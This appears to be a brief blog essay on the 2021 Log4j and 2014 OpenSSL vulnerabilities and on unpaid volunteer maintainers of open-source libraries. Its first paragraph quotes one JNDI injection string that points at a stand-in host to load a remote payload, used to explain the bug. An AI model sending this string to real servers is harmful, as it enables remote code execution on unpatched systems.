on November 24th, 2021, an bug was discovered in the open-source Java logging library Log4j, which allowed attackers to potentially gain remote code execution simply by sending a certain string. obviously, having someone be able to take control of your server simply by sending ${jndi:ldap://example.com/payload} isn't a good thing. the bug was patched upstream relatively quickly, but it's likely that knock-on effects of this vulnerability will be seen for months if not years to come, as patching enterprise software with layers and layers of legacy code surrounding it may be quite challenging.

a similar issue happened in April 2014, where a bug was discovered in the ubiquitous TLS library OpenSSL, allowing for attackers to read data they shouldn't be allowed to read. the bug was also patched rather quickly, and after a media frenzy of misinformation and confusion, faded into obscurity.

both of these bugs share a few traits in common, however. both are in simple to implement but hard to replace libraries for incredibly common functions that are almost completely necessary for the functionality of the modern Internet, and both libraries are maintained by small teams who mostly do this work as volunteers. despite being integral to the core of our modern society, these small teams generally are completely unnoticed, and generally don't get any payment for what they do either.

in many ways, this is simply how modern open source works. small projects are taken and used by massive corporations without any compensation, but they in return are required to release much of their own work openly as well. but just because something is released openly, does not mean it can easily be compiled and used. have you ever tried to compile Android? many corporations seem to be taking advantage of this, by letting people to all the hard work for them for free, and then just duct taping everything together and slapping their logo on top.

still, I don't think I can imagine a way to make things work better.